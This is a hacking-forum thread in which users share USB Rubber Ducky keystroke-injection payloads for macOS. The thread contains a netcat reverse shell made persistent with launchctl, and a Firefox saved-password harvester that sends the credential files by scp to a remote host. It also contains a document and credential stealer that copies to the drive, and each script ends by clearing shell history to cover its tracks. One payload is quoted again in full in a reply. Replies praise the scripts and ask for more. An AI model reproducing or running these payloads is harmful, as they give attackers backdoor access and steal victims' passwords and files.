Shark3y Posted January 26, 2013 Share Posted January 26, 2013 Hi everyone. I couldn't think of a better way to make a first post than to contribute some content. Here is a very very basic reverse shell ducky script that works on OS X. I've found the OS X payloads to be few and far between and I plan on posting many more of them here. Post yours too! I changed some stuff to be a little more verbose / easy to follow. Hope you enjoy (it's shockingly simple) REM title: osx reverse shell - execute in background - minimize terminal - run on startup DELAY 500 GUI SPACE DELAY 300 STRING terminal ENTER DELAY 600 STRING touch script.sh ENTER STRING echo "mkfifo foo" > script.sh ENTER STRING echo "nc 192.168.1.19 4444 <foo | /bin/bash 1>foo" >> script.sh ENTER STRING chmod +rwx script.sh ENTER STRING launchctl submit -l someName -p ~/script.sh ENTER STRING ./script.sh& ENTER STRING clear ENTER GUI m This simply creates a script with a netcat command that routes a command prompt to the host (192.168.1.19) on port 4444. It adds this script to the launch daemon so that it acts as a backdoor. Note however that because of the way the script is written, it will connect back on login, and not continuously attempt to connect back. It then runs it in background, clears the screen and minimizes. Enjoy, I will be posting more advanced payloads soon! -Shark3y Quote Link to comment Share on other sites More sharing options...
Shark3y Posted January 31, 2013 Author Share Posted January 31, 2013 Here is fully 'weaponized' firefox saved credential harvesting ducky-script. I started with firefox, because that's what I use. Other browsers coming soon. REM title: OSX harvest firefox password files > secure transfer > cover tracks DELAY 1200 GUI SPACE DELAY 200 STRING terminal ENTER DELAY 1400 STRING cd ~/Library/Application\ Support/ ENTER STRING scp "$(find . -iname "key3.db")" "$(find . -iname "signons.sqlite")" user@host:~/Directory_to_save_creds/ ENTER DELAY 900 STRING yes ENTER DELAY 600 STRING sshpassword ENTER DELAY 1000 STRING rm ~/.ssh/known_hosts ENTER DELAY 100 STRING history -c ENTER DELAY 100 GUI q ENTER I used scp for the file transfer, though you could easily use other methods that may be quicker (no authentication) but this script still executes in about 10 seconds or so. Also, this script removes the obvious evidence such as known_hosts file, as well as clearing the command history. On a side note, I used the find command because sometimes the files are in the mozilla folder, and because the profile folder has a random prefix, this way we get what we want no matter what ;) You can increase the speed of the command by using direct pathnames but you lose some functionality. Enjoy. Quote Link to comment Share on other sites More sharing options...
Shark3y Posted February 10, 2013 Author Share Posted February 10, 2013 Here is my next payload. It requires the twin duck firmware. It also implies the sd card is named "DUCKY". I was playing around with the twin duck firmware and wanted to think of something productive to do while the drive is loading. I came up with stealing all of the *.doc/docx/pdf/odt files inside of ~/Documents/ as well as the firefox saved passwords. My method allows you to steal as many documents as possible UNTIL the drive is ready then whatever you have thus far in the .zip file is sent over to the drive. Maximum speed is what I was going for, since it already takes so damn long for the drive to pop up. The script will blast out an entire bash line, then minimize the terminal. The ducky drive will pop up, and as soon as it disappears you can remove the drive (it ejects it as soon as the other stuff is done). REM title: OSX harvest firefox password files / assorted doccuments --> copy to folder on drive named after user name --> cover tracks DELAY 2000 GUI SPACE DELAY 300 STRING terminal ENTER DELAY 1000 STRING until ls -l /Volumes/DUCKY | grep -q ".*";do find ~/Documents -type f \( -name '*.doc' -o -name '*.docx' -o -name '*.pdf' -o -name '*.odt' \) | sed 's/./\\&/g' | xargs -n1 zip docs_$(whoami)_$(date +"%m-%d-%y"); echo "WAITING FOR DRIVE...";done; echo "MOUNTED... COPYING..."; cp docs_$(whoami)_$(date +"%m-%d-%y").zip /Volumes/DUCKY/; mkdir /Volumes/DUCKY/$(whoami); cd ~/Library/Application\ Support/; cp "$(find . -iname "key3.db")" "$(find . -iname "signons.sqlite")" /Volumes/DUCKY/$(whoami)/; diskutil eject DUCKY; rm docs_$(whoami)_$(date +"%m-%d-%y").zip; history -c; clear; exit; ENTER GUI m I'm working on something much more interesting but I don't want to give too much information until it's done. Just a hint, it's iSight related ;) I hope someone is enjoying these... -Shark3y Quote Link to comment Share on other sites More sharing options...
sober Posted February 20, 2013 Share Posted February 20, 2013 i will say im enjoying them as i am picking up rubber ducky and was getting payloads in order, few less i have (or get) to write :D Quote Link to comment Share on other sites More sharing options...
brazen Posted February 18, 2014 Share Posted February 18, 2014 Here is my next payload. It requires the twin duck firmware. It also implies the sd card is named "DUCKY". I was playing around with the twin duck firmware and wanted to think of something productive to do while the drive is loading. I came up with stealing all of the *.doc/docx/pdf/odt files inside of ~/Documents/ as well as the firefox saved passwords. My method allows you to steal as many documents as possible UNTIL the drive is ready then whatever you have thus far in the .zip file is sent over to the drive. Maximum speed is what I was going for, since it already takes so damn long for the drive to pop up. The script will blast out an entire bash line, then minimize the terminal. The ducky drive will pop up, and as soon as it disappears you can remove the drive (it ejects it as soon as the other stuff is done). REM title: OSX harvest firefox password files / assorted doccuments --> copy to folder on drive named after user name --> cover tracks DELAY 2000 GUI SPACE DELAY 300 STRING terminal ENTER DELAY 1000 STRING until ls -l /Volumes/DUCKY | grep -q ".*";do find ~/Documents -type f \( -name '*.doc' -o -name '*.docx' -o -name '*.pdf' -o -name '*.odt' \) | sed 's/./\\&/g' | xargs -n1 zip docs_$(whoami)_$(date +"%m-%d-%y"); echo "WAITING FOR DRIVE...";done; echo "MOUNTED... COPYING..."; cp docs_$(whoami)_$(date +"%m-%d-%y").zip /Volumes/DUCKY/; mkdir /Volumes/DUCKY/$(whoami); cd ~/Library/Application\ Support/; cp "$(find . -iname "key3.db")" "$(find . -iname "signons.sqlite")" /Volumes/DUCKY/$(whoami)/; diskutil eject DUCKY; rm docs_$(whoami)_$(date +"%m-%d-%y").zip; history -c; clear; exit; ENTER GUI m I'm working on something much more interesting but I don't want to give too much information until it's done. Just a hint, it's iSight related ;) I hope someone is enjoying these... -Shark3y Shark3y... these are amazing! do you have anything else? yours are the only that I can find for os x. Quote Link to comment Share on other sites More sharing options...
hakhu6 Posted April 27, 2014 Share Posted April 27, 2014 I've seen a chrome harvesting payload on this forum as well where it goes into browser settings, shows passwords, copy and pastes them to a notepad file and then to the ducky, However on OSX when you click 'show passwords' you are required to enter the account password as authentication to proceed. Does ducky get around this or does it stop it in its cute little webbed tracks? Quote Link to comment Share on other sites More sharing options...
activezombie Posted September 27, 2014 Share Posted September 27, 2014 Shark3y, thank you for the effort but your script does nothing but copy an empty folder under the user name. So this manages to copy the home folder with nothing inside. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.